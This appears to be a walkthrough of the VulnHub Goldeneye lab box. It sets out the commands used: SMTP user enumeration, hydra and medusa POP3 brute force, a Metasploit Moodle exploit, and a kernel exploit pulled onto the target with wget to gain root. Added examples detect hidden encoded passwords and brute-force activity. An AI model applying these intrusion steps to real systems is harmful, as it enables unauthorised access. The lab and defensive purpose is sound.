In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!
A typical Nmap scan reveals a few ports – 80 and 25.
nmap -sC -sV -v 192.168.109.133
We’ll check out the webpage but first let’s get another scan going in the background
nmap -sC -sV -v -p- 192.168.109.133
This will search for all ports not just the top 1000 while we do other things.
Navigating to the webpage gives us a fun taste of the box theme.
It also gives a directory to browse. Let’s see what’s there.
Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.
There’s not much here but let’s see what terminal.js is.
Here we have something interesting. It looks like we have two user names and one encoded password.
I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the Decode as drop down on the right and select HTML. This reveals the password of InvincibleHack3r.
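The password above was hidden in a JavaScript file as HTML numeric character references, which is the kind of thing a secret scan over a web root should catch. The following is an added example, not code from the original post: a small scanner that flags long runs of `&#NNN;` entities in source text and decodes them; the JavaScript sample is constructed to mimic the situation on this box.

```python
import html
import re

# Constructed sample, not the box's real terminal.js: a password encoded as
# HTML numeric character references inside a JavaScript comment, plus one
# short, harmless entity that must not be flagged.
SAMPLE_JS = """// constructed sample comment block
// reminder from the admin: the login password is
// &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
var footer = "&#169; 2018";  // a single entity: legitimate markup, not a secret
"""


def find_encoded_strings(source: str, min_run: int = 8) -> list[dict]:
    """Return every run of at least `min_run` consecutive numeric character
    references, with its line number and the decoded text.

    A single entity (e.g. a copyright sign) is normal in web code; a long
    unbroken run is almost always text someone wanted to hide from a casual
    view of the source, so only runs of `min_run` or more are reported.
    """
    entity = r"&#(?:x[0-9A-Fa-f]+|[0-9]+);"        # decimal or hex reference
    run = re.compile(rf"(?:{entity}){{{min_run},}}")
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in run.finditer(line):
            decoded = html.unescape(match.group(0))
            findings.append({
                "line": lineno,
                "encoded": match.group(0),
                "decoded": decoded,
                # non-printable output usually means a false positive
                "printable": decoded.isprintable(),
            })
    return findings


if __name__ == "__main__":
    for hit in find_encoded_strings(SAMPLE_JS):
        print(f"line {hit['line']}: {hit['decoded']!r}")
```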
Now let’s try that login again.
It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.
Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.
Now let’s go back to our nmap scan and see if it found the pop3 ports.
It looks like it did. Unfortunately, the password for Boris doesn’t work.
At this point, we have things we can do and since they might take a little time, let’s get them going at the same time.
First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, it’s not an option. Hydra will crash after a couple minutes but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash but it will throw errors and recover, so I went with Medusa instead. The problem is still a short password list. I ended up using a top-10,000 password list from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works the best in this case is called fasttrack.txt. It’s native to Kali, unlike SecLists, which is cloned from GitHub.
Ok so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the smtp server on port 25. Let’s see who’s valid.
Using netcat (nc -nv 192.168.109.133 25) we can log into the smtp server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back but the others do not. There’s no sense wasting time brute forcing users that don’t exist, so let’s just create a text file with their names only.
Now we can use hydra or medusa to run through the password list.
hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007
medusa -U users -P /usr/share/wordlists/fasttrack.txt -h 192.168.109.133 -n 55007 -M pop3 -t 16
With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.
Medusa will also have issues, but it will recover and continue, and you can do both names together.
Either way, after a couple minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris’s.
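Both steps above, the VRFY user enumeration on port 25 and the pop3 password guessing on 55007, leave an obvious footprint in mail server logs. As an added example (not part of the original post), here is detection logic run over constructed log lines in a simplified Dovecot/Postfix-like shape; the line format and the thresholds are assumptions, so adapt the regexes to your own server's output.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log (not real server output): one event per line with a
# source IP, either an SMTP VRFY probe or a failed POP3 login.
SAMPLE_LOG = """\
smtpd: VRFY from 192.168.109.128 user=boris reply=252
smtpd: VRFY from 192.168.109.128 user=natalya reply=252
smtpd: VRFY from 192.168.109.128 user=xenia reply=550
smtpd: VRFY from 192.168.109.128 user=janus reply=550
smtpd: VRFY from 192.168.109.50 user=postmaster reply=252
pop3-login: auth failed user=<boris> rip=192.168.109.128
pop3-login: auth failed user=<boris> rip=192.168.109.128
pop3-login: auth failed user=<boris> rip=192.168.109.128
pop3-login: auth failed user=<natalya> rip=192.168.109.128
pop3-login: auth failed user=<natalya> rip=192.168.109.128
pop3-login: auth failed user=<natalya> rip=192.168.109.128
pop3-login: auth failed user=<doak> rip=192.168.109.50
"""

VRFY_RE = re.compile(r"VRFY from (?P<ip>[\d.]+) user=(?P<user>\S+)")
POP3_RE = re.compile(r"pop3-login: auth failed user=<(?P<user>[^>]*)> rip=(?P<ip>[\d.]+)")


def analyse(log: str, vrfy_threshold: int = 3, auth_threshold: int = 5) -> dict:
    """Flag source IPs that probe many distinct users via VRFY (enumeration)
    or rack up many POP3 authentication failures (password guessing).

    Thresholds are assumptions for the sample; tune them to your baseline.
    """
    vrfy_users = defaultdict(set)   # ip -> set of usernames probed
    auth_failures = Counter()       # ip -> number of failed logins
    for line in log.splitlines():
        m = VRFY_RE.search(line)
        if m:
            vrfy_users[m["ip"]].add(m["user"])
            continue
        m = POP3_RE.search(line)
        if m:
            auth_failures[m["ip"]] += 1
    return {
        "vrfy_enumeration": sorted(ip for ip, users in vrfy_users.items()
                                   if len(users) >= vrfy_threshold),
        "pop3_bruteforce": sorted(ip for ip, n in auth_failures.items()
                                  if n >= auth_threshold),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

On the mitigation side, Postfix can refuse the VRFY command outright with `disable_vrfy_command = yes` in main.cf, which removes the enumeration step entirely.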
Anyway, we’ll just let the brute force run while we do this other stuff.
Next we can start gobuster on the website to see if there are any other hidden directories. gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.109.133 (It won’t find anything)
Finally, we’ll start a nikto scan on the website while we guess passwords. nikto -h 192.168.109.133
This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.
Users – Xenia and Janus
Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)
By now our password brute force should be finished and we can put those credentials to good use.
Let’s log into the pop3 server and check out some emails.
nc -nv 192.168.109.133 55007
There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.
Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the /etc/hosts file first as the email suggests. Then navigate to the site.
At the bottom of the page you can find it’s running Moodle. Once logged in, it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.
Let’s see how secure his password is.
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007
These secret agents really need to pick better passwords. Well let’s see what’s in his email.
Ok now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.
Let’s view the file
Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.
We can either run file or exiftool. Either way a base64 encoded string can be found in the image description.
Decoding this reveals a password for the admin account.
echo eFdpbnRlcjE5OTV4IQ== | base64 -d
Let’s log in one more time as the admin.
Now we can easily identify the Moodle version.
A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.
There is one important thing to point out with this module. The target id must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So just set the target to 0 before you run the exploit.
There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not, and you have to set it manually.
Once this is set run the exploit and you should get a shell.
Now I’ll upgrade my shell using python. It’s not really necessary for this box, but it’s still nicer to work with.
python -c 'import pty; pty.spawn("/bin/bash")'
There are a couple scripts I usually download and run at this point, but it turns out they are not super helpful. The exploits are there but buried. It was much easier to find by enumerating the kernel manually.
The first search that pops up looks like it fits.
It’s C code so let’s use GCC and compile it on our box.
It gives some warnings, but it looks like it compiled. Let’s see if it works.
I started a python server and used wget to transfer the file.
Attacker box: python -m SimpleHTTPServer 80
Victim box: wget 192.168.109.128/a.out
chmod +x a.out
When we run it, it doesn’t work. One of the error messages is gcc: not found.
That’s odd right? Let’s look at the code and search for gcc.
So the code is compiling something else when it runs. Remember the hint about gcc being removed. The compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.
Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.
Once the new version using cc is run, a root shell spawns.
The root flag is hidden. Use ls -lah to find it.
The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.
Well that was Goldeneye. The word list thing was a little frustrating, but the theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.